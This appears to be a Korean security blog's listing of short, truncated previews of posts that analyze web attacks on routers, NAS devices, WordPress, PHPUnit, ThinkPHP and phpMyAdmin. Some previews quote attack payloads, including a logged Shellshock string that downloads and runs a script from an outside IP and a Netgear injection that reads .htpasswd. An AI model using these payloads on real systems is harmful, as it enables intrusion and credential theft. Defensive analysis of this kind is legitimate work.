취약점 [Vulnerability]/웹 취약점 (Web Vulnerability)

해당 글 15

[V-Web] 15. LinkSys Remote Command Execution (LinkSys 원격 명령 실행 취약점)

Intro 링크시스(Linksys)란? 벨킨이 현재 생산하고 있는 가정 및 소규모 오피스 네트워크 제품의 브랜드 이름입니다. Summary 본래 1995년에 설립한 별개의 기업이었으나, 2003년에 시스코 시스템즈에 인수되었고 이후, 2013년 5월에 벨킨에 인수되었습니다. [Linksys 라우터, 스위치, WiFi 제품] 제품들은 과거부터 현재까지 브로드밴드 및 무선 라우터, 소비자 및 소규모 비즈니스 이더넷 스위치, VoIP 장비, 무선 인터넷 비디오 카메라, AV 제품, 네트워크 스토리지 시스템 등의 제품으로 분류되어 판매되고 있습니다. Explanation Linksys E-series devices 1. Bypass URL POST/tmBlock.cgi HTTP/1.1 현 취약점은 LinkSys..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 7. 3. 16:16

[V-Web] 14. ZyXEL NAS Command Injection 취약점 CVE-2020-9054 (ZyXEL NAS Command Injection vulnerability)

Intro ZyXEL 회사는 네트워크 장치 제조 업체입니다. 대만에 본사를 두고 있으며, 북미, 유럽, 아시아 등에 지사를 두고 있습니다. 그리고 약 150개 이상의 국가에 제품을 판매하고 네트워크 공급 업체, 통신 회사, ISP 및 기타 중소기업들과 협력하고 있습니다. Summary [ZyXEL의 ZyWALL USG 제품] ZyXEL에는 USG 시리즈는 올 인원 차세대 통합 보안장비(NGFW)가 대표적이고 바이러스, 악성코드, 웹 피싱, 스파이웨어, 스팸 등 외부의 불법 침입 시도를 차단할 수 있는 UTM 장비가 있습니다. Kaspersky, Trend Micro, Cyren 과 같은 세계 최고의 보안 회사의 엔진을 탑재하여 주기적인 업데이트를 통해 최신 보안 위협으로 부터 빠르고 정확한 실시간 보호 ..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 7. 2. 11:29

[V-Web] 13. CitrixADC 및 CitrixGateway 취약점 (Citrix ADC and Citrix Gateway Directory Traversal Vulnerability CVE-2019-19781)

Intro CitrixADC는 CitrixSystems가 소유하는 네트워크 제품 군입니다. CitrixSystems의 제품들은 소프트웨어 정의 광역 네트워킹 관리를 제공하는 CitrixADC, ADC(ApplicationDeliveryController), NetScalerAppFirewall, 애플리케이션 방화벽, NetScalerUnifiedGateway, NetScalerManagement&AnalyticsSystem, NetScalerSD-WAN으로 구성이 되어 있습니다. Summary [NetScaler 로그인 화면] NetScaler는 1997년 MichelKSusai에 의해 처음 개발되었으며 2005년 Citrix에 인수되었습니다. 그리고 Citrix은 2016년에 비로서, NetScaler..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 7. 1. 12:40

[V-Web] 12. Bash shellshock 취약점 (attempt to build an ircbot bonet)

2014년에 발표된 이후로 여전히 Bash Shellshock 취약점은 주요 자동화공격 대상에 포함되어 있습니다. 쉘쇼크 취약점 스캔 로그는 ircbot 기반의 DDoS 봇넷 구축을 하려는 시도로 보입니다. 1. Payload () { :;};/usr/bin/perl 2. 공격구문 "GET HTTP/1.1 HTTP/1.1" 400 455 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 6. 1. 14:18

[V-Web] 11. 스캔성 웹서버 공격 (Scanable Web Server Attack)

웹 스캔이란? 웹 사이트의 취약한 부분을 조사 및 분석하는 도구입니다. 웹 서버의 종류나 버전, 디렉터리 구조 그리고 중요한 파일이 존재하는지 검사합니다. HTTP 요청을 보내고 서버의 응답 코드를 받아 페이지의 존재여부와 취약한 부분을 확인할 수 있다. 1. xmlrpc.php 스캔 "GET /xmlrpc.php HTTP/1.1" 404 416 "-" "PycURL/7.19.5 libcurl/7.38.0 GnuTLS/3.3.8 zlib/1.2.8 libidn/1.29 libssh2/1.4.3 librtmp/2.3" 워드프레스의 XML-RPC(xmlrpc.php) 기능에는 다양한 취약점이 존재합니다. 이 기능은 HTTP 규약을 이용하여 XML 데이타 송수신을 지원하고 취약한 버전의 경우에는 다른 서버를 ..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 6. 1. 10:22

[V-Web] 10. MySQL 관리자 인터페이스 전용 취약점 탐지 도구 (Jorgee Security Scanner)

해커들이 사용하는 취약점 스캐너 중 Jorgee Security Scanner는 phpmyadmin과 같이 MySQL 관리자 애플리케이션을 탐지하는 도구입니다. 2012년 이전부터 지속적으로 탐지가 되었으며, MySQL SQL 관리기능을 표적으로 하는 웹취약점스캐너라고 입니다. 1. Payload HEAD http://122.32.19.138:80/mysql/admin/ HTTP/1.1 404 180 "-" User-Agent: Mozilla/5.0 Jorgee User-Agent 문자열은 Mozilla/5.0 Jorgee를 사용하며, HTTP 요청은 HEAD http://122.32.19.138:80/mysql/dbadmin/와 같이 GET이 아니라 HEAD를 사용하면 IP주소를 이용한다는 것이 특징입..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 29. 14:53

[V-Web] 09. 아파치 프록시 남용 공격 (Apache Proxy Abuse)

아파치(apache)란? 세계에서 가장 많이 쓰는 웹 서버중 하나이며, 아파치 소프트웨어 제단에서 관리하는 HTTP 웹 서버 이다. Apache는 Apache재단에서 만든 HTTP서버로 워낙 다양한 추가기능에, 구축이 쉽다는 이유 때문에 많이 쓰고 있습니다. 하지만 Apahce 자체만으로 엄청 무겁고, Squid와 함께 Slowloris 취약점이 발견되었기에, 보통 프로그래밍 능력이 능숙한 사람들이나, 대형사이트 운영자는 Nginx, IIS를 주로 쓰고있지만 대부분의 중소기업들은 무료이기 때문에 많이 쓰입니다. 프록시 남용공격(Apache Proxy Abuse)이란? 다른 웹 서버의 프록시 기능을 악용하는 것입니다. 프록시(proxy)는 '대리'라는 의미로, 직접 통신할 수 없는 두 점 사이에서 통신을 ..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 29. 13:51

[V-Web] 08. DrayTek 취약점 (DrayTek pre-auth remote root RCE)

DrayTek은 방화벽, VPN 장치, 라우터 및 무선 LAN 장치를 포함한 광대역 CPE 제조업체입니다. DrayTek 장치에서 임의의 코드 실행을 허용 할 수있는 여러 가지 취약점이 발견되었고 성공적으로 악용하면 영향을받는 시스템에서 임의의 코드를 실행할 수 있습니다. 이를 통해 공격자는 네트워크 트래픽을 도청하고 SSH 및 웹 기반 백도어를 운영하며 시스템 계정을 만들 수 있습니다. 취약점의 핵심은 keyPath와 rtick 필드입니다. keyPath 필드의 입력 제어가 없다면 /www/cgi-bin/mainfunction.cgi에서 사용하는 formLogin() 함수를 통해 임의의 명령을 주입 할 수 있습니다. rtick 필드의 입력 제어가 없다면 /www/cgi-bin/mainfunction.c..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 28. 13:58

[V-Web] 07. 워드프레스 admin-ajax 취약점

/wp-admin/admin-ajax.php는 워드프레스 AJAX-API의 일부이며, 플러그인 사용을 위해 참조하는 페이지입니다. 대부분 프론트앤드, 백엔드 개발자들이 많이 사용하는 페이지입니다. 워드프레스에는 수많은 플러그인들이 존재하기 때문에, 해당 페이지에서 항상 취약점이 발생합니다. Total Donations, Ajax Load More 등의 플러그인 취약점들이 많이 발생한 이력이 있으며, 인가되지 않은 출발지 IP의 사용자가 접근 시 주의해야합니다. 1. Payload /wordpress/wp-admin/admin-ajax.php 2. 공격구문 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: http://wwwwww.com User-Agent:..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 27. 15:02

[V-Web] 06. Netlink GPON Router 1.0.11 (원격 코드 실행 취약점)

Netlink GPON은 국내의 가장에서 사용하는 iptime과 같은 와이파이 모뎀입니다. 해당 Netlink 모델에서 원격 코드 실행 취약점이 존재하였습니다. Netgear 라우터는 원격 공격자가 / boaform / admin / formPing URI에 의한 잘못된 입력 유효성 검사로 인해 시스템에서 임의의 코드를 실행할 수있게 합니다. 공격자는 특수하게 조작 된 요청을 보내이 취약점을 악용하여 시스템에서 임의의 코드를 실행할 수 있습니다 1. Payload /boaform/admin/formPing 2. 공격구문 POST /boaform/admin/formPing HTTP/1.1 User-Agent: polaris botnet Accept: */* Accept-Encoding: gzip, defl..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 27. 13:46

[V-Web] 05. PHPUnit 원격코드 실행 취약점

PHPUnit은 PHP 프로그래밍 언어를 위한 유닛 테스트 프레임워크입니다. SUnit과 함께 기원한 유닛 테스트 프레임워크를 위한 XUnit 아키텍처의 인스턴스이며 JUnit과 함께 대중화되었고 PHPUnit은 Sebastian Bergmann이 개발하였으며 개발 자체는 깃허브에서 호스팅되고 있습니다. 1. Payload /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php Vendor는 패키지가 저장되는 폴더이며, Composer를 통해 설치되는 패키지들을 저장합니다. Composer란? ruby 의 bundle 처럼 패키지간의 의존성을 관리해 주는 유틸리티이며, 패키지가 설치되어야 하는 버전을 찾아, 알맞은 버전의 패키지들과 의존 패키지들을 설치해줍니다. 2...
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 27. 10:59

[V-Web] 04. Netgear DGN1000 / DGN2200 인증우회 취약점 (Multiple Vulnerability)

넷기어 DGN은 국내의 가장에서 사용하는 iptime과 같은 와이파이 모뎀입니다. 해당 Netgear 모델에서 원격 코드 실행 취약점이 존재하였습니다. Netgear 라우터에 액세스를 시도하면 다음과 같은 인증 페이지가 노출됩니다. 그리고 인증절차가 올바르지 않으면 액세스 거부를 하게 됩니다. 하지만, 'currentsetting.htm'을 통해 인증 메커니즘을 무시하고 장치의 컨텍스트 내에서 명령을 실행할 수 있게 됩니다. 1. Payload www.example.com/setup.cgi?currentsetting.htm=1 2. 공격구문 setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd = cat + / www / .htpasswd & amp;curpath = / ..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 27. 10:09

[V-Web] 03. ThinkPHP 원격코드 실행 취약점 (CVE-2018-20062)

ThinkPHP는 중국 TopThink에서 개발한 php기반의 웹 애플리케이션 프레임 워크입니다. Apache2 기반으로 만들어 졌으며, 중국에서는 빠른 프로젝트 개발 진행을 할 수 있었기 때문에 인기가 많았습니다. ThinkPHP는 URL 쿼리 매개 변수를 분석하여, 모듈과 컨트롤러를 검색합니다. 순서 : 모듈 -> 액션 값 -> ID -> Data 순으로 정립 URL 쿼리는 '/'를 구분자로 사용하여 분석하는데, 해당 취약점은 '\'과 'invokefunction' 함수를 이용하여 구문 분석 및 원격 코드 실행을 할 수 있도록 합니다. 1. Payload index.php? s = index / \ think \ app / invokefunction & function = call_user_func_..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 27. 09:48

[V-Web] 02. PHPmyadmin 취약점 (로그인 페이지 접근 시도)

phpmyadmin 페이지는 MySQL을 설치 후에 접근성과 간편함을 위해 웹으로 만들어진 페이지입니다. 대체적으로 개발자가 사용자를 추가하거나 데이터베이스를 생성 및 수정하기 위해 접속합니다. 그러므로 인가되지 않은 출발지 IP가 접근한다면 해킹시도를 의심해야 합니다. 1. phpMyAdmin 로그인 페이지 GET /phpmyadmin/ HTTP/1.1 Host: www.aaaa.com Accept: text/html,application/xhtml,application/xml;q=0.9,image/webo,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate;q=1.0, identity;q=0..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 26. 17:25

[V-Web] 01. 워드프레스 관리자페이지 접근 (WordPress Vulnerability)

워드프레스의 관리자 로그인은 본인의 URL(웹사이트 주소) 뒤에 '/wp-admin'을 입력하여 접근한다. 이 외에도 취약한 페이지들이 다양하게 존재한다. 그러므로 인가되지 않은 출발지 IP가 접근한다면 해킹시도를 의심해야 한다. 1. 워드프레스 홈페이지 로그인 페이지 GET /wp-login.php HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agaent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ※ 해결방안 1. 로그인 페이지의 주소를 변경 (워드프레스의 플러그인을 이용하여 새로운 경로를 지정할 수 있다) 설정 후, 해당경로에 접근하게 되면 (404에러)로 표시된다. 2. 워드프레스에는 .htaccess 파일..
취약점 [Vulnerability]/웹 취약점 (Web Vulnerability) 2020. 5. 26. 16:53